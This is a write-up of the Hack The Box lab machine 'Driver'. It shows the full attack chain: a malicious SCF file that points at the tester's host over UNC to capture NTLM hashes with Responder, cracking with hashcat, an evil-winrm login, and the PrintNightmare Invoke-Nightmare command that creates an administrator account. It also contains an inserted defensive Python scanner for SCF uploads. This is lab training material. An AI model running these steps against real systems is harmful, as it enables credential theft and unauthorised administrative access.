Prelude

Driver is an easy machine from Hack The Box, developed by MrR3boot. This was an easy but cool box that demonstrated the recent PrintNightmare vulnerability.

The initial foothold was also a pretty cool vector, and it taught me how to misuse SCF files to dump NTLM hashes.

Let's start the enumeration.

Exploitation

Nmap returned the following results.

Nmap scan report for 10.10.11.106
Host is up (0.048s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Port 5985 (WinRM) is open, so PS-Remoting is possible.

I navigated to http://10.10.11.106/ and found an HTTP basic authentication prompt.

I used admin:admin and I got logged in!

It was a website where users can upload firmware files for different printers. The site said that once a file is uploaded, someone will manually review and test the firmware.

fw_up.php page to upload the firmware

I tried different payloads such as exe and msi files, but nothing worked.

Upon further research, I found a way to force NTLM authentication using different file types. I referenced articles from ired.team, BleepingComputer and pentestlab about how to use SCF (Shell Command Files) to force NTLM authentication.

SCF files are a variant of shortcuts that support a very limited set of Windows Explorer commands, such as opening a Windows Explorer window or showing the Desktop. The "Show Desktop" shortcut we all use on a daily basis is an SCF file.

An SCF file can reference a specific UNC path, which lets an attacker capture the NTLM credentials of a victim who browses the folder containing the malicious SCF file.
When the victim browses that folder, a connection is automatically established from their system to the UNC path given as the icon path in the SCF file. Windows then tries to authenticate to that SMB share with the user's username and password, and Responder captures the victim's NTLMv2 hash.

I created the malicious SCF file with the following contents.

[Shell]
Command=2
IconFile=\\10.10.14.86\nc.ico
[Taskbar]
Command=ToggleDesktop

Then I uploaded the SCF file to the firmware upload page fw_up.php, started Responder with the following command, and got the NTLM hash of the user tony.

sudo responder -I tun0
Sweet!
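As an added defensive check (not part of the writeup or the box), here is a small Python scanner for uploaded files that parses SCF contents and flags an IconFile pointing at a UNC host outside an allow-list. Both sample files and the allow-list network are constructed for the example.

```python
import configparser
import ipaddress
import re

# Constructed sample: the same shape of SCF the writeup uploads to fw_up.php,
# written as a raw string so the UNC backslashes survive as Windows reads them.
MALICIOUS_SCF = r"""[Shell]
Command=2
IconFile=\\10.10.14.86\nc.ico
[Taskbar]
Command=ToggleDesktop
"""

# Constructed sample: a benign "Show Desktop" style SCF with a local icon path.
BENIGN_SCF = r"""[Shell]
Command=2
IconFile=%SystemRoot%\system32\SHELL32.dll,34
[Taskbar]
Command=ToggleDesktop
"""

UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")  # \\host\share\... -> host


def parse_scf(text):
    """Parse the INI-style SCF sections; raise ValueError if it is not INI-shaped."""
    cp = configparser.ConfigParser(interpolation=None)  # '%' in paths is literal
    cp.optionxform = str  # keep IconFile/Command casing as written
    try:
        cp.read_string(text)
    except configparser.Error as exc:
        raise ValueError(f"not a parsable SCF: {exc}") from exc
    return {name: dict(cp[name]) for name in cp.sections()}


def host_is_trusted(host, trusted_nets):
    """True only for IP literals inside an allow-listed network; hostnames are never trusted."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in ipaddress.ip_network(net) for net in trusted_nets)


def scf_findings(text, trusted_nets=()):
    """Return human-readable findings for one uploaded SCF body (empty list = clean)."""
    findings = []
    shell = parse_scf(text).get("Shell", {})
    match = UNC_HOST.match(shell.get("IconFile", ""))
    if match and not host_is_trusted(match.group(1), trusted_nets):
        findings.append(f"IconFile resolves to untrusted UNC host {match.group(1)}")
    return findings
```

Running this over every file dropped into the firmware upload directory before a reviewer opens it in Explorer is enough to catch the exact trick used here.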

I then used a supercool hash identification script called NTH (Name-That-Hash) to find the hash type and the hashcat/JtR mode number.
Name-That-Hash can be cloned from here, or it can be installed on Kali Linux using the command sudo apt install name-that-hash

We can pass hashes explicitly via the -t flag or we can use the -f flag to pass a file containing hashes to Name-That-Hash.
Syntax:
nth -t <HASH>
OR
nth -f <FILE-LOCATION>

Then I used hashcat to crack the NTLM hash.

hashcat -m 5600 tony.hash /usr/share/wordlists/rockyou.txt 

The hash got cracked and the password for the user tony was liltony.

I then used evil-winrm to login as tony, since port 5985 is open.

evil-winrm  -u tony -p 'liltony' -i 10.10.11.106 

And I got in as tony!

Privilege Escalation

By the nuances I've seen in this machine so far, it was obvious that it is vulnerable to the recent PrintNightmare vulnerability.

CVE-2021-1675 / PrintNightmare is a vulnerability in the Print Spooler service, affecting all Windows versions alike. It allows anyone with valid credentials on a Windows machine to add a new printer and load drivers for it.

There are more than one way to exploit this vulnerability and you can read more about them from 0xdf's blog.

I used the PowerShell script hosted in this GitHub repo, mentioned in 0xdf's blog.

I used evil-winrm's upload feature to upload the script.
After that, I used the following commands to load and execute the script.

Import-Module .\pn.ps1
Invoke-Nightmare -NewUser "secnigma" -NewPassword "secret123"

Once this was executed, the script created a new user named secnigma with the given password as a Local Administrator!

After that, I logged into the machine using evil-winrm with secnigma's creds and I was root!

w00t!

Postlude

And that was Driver!

A fun, easy box with a cool privesc exploitation and an even cooler initial foothold vector.

Kudos to MrR3boot for this learning experience!

Peace out! ✌
